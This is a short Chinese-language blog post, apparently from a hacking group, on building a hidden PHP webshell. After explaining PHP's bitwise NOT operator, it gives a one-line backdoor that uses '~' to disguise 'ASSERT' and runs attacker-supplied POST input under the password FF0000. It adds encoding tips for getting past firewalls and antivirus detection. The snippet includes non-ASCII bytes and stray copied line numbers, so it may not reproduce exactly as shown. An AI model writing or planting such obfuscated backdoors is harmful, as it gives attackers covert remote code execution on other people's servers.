PHP中使用按位取反(~)函數建立後門

 　　1)PHP ~位元運算符

　　PHP: 位元運算符 - http://www.php.net/manual/zh/language.operators.bitwise.php

　　前一段時間老外在twitter上爆出個有趣的東西，一串疑似亂碼的字串訪問後卻能正常輸出1337，於是便有了以下研究成果。

　　~ $a Not(按位取反) 將 $a 中為 0 的位設為 1，反之亦然。

　　PHP 的 ini 設定 error_reporting 使用了按位的值，提供了關閉某個位的真執行個體子。要顯示除了提示層級之外的所有錯誤。

　　php.ini 中是這樣用的： E_ALL & ~E_NOTICE

　　具體運作方式是先取得 E_ALL 的值： 00000000000000000111011111111111

　　再取得 E_NOTICE 的值： 00000000000000000000000000001000

　　然後通過 ~ 將其取反： 11111111111111111111111111110111

　　最後再用按位與 AND(&)得到兩個值中都設定了(為 1)的位： 00000000000000000111011111110111

　　2)分析並重現

　　這個就是當時最原始的代碼實現效果：

　　當看到這個效果的時候最先想到的就是繞過防火牆等後門的實現，之後開始考慮這是哪種編碼方式?

　　後來同李普君測試中發現直接使用echo ~'1';等則會直接輸出以上的'亂碼'，方到看完PHP官方~函數的解釋才恍然大悟。

　　那麼我們便可以開始寫一句話試試效果了：

　　?1

　　2

　　3

　　4

　　$x=~Ÿ¬¬º­«;

　　$x($_POST[~¹¹ÏÏÏÏ]);

　　?>

　　這裡定義$x變數為ASSERT，然後密碼為FF0000直接連結後門便可，因為當位取反出來'亂碼'後我們再取一次反即可返回正常值。

　　3)關於編碼與免殺

　　當重現這個後門的時候我發現，直接Copy過來的直接HTTP狀態500，源頭是編碼問題，上面這種'亂碼'其實為西歐(ISO-8859-15)。

　　實際過程中我們遇到了多次後門無法連結出現500的錯誤均勢因為編碼問題，如果預設編碼無法識別將編碼方式儲存為這種即可(GBKUTF8...均不能成功使用)

　　Author: Evi1m0 [Email: evi1m0#ff0000.cc]

　　From: 邪紅色資訊安全性群組織 [FF0000 TeAm]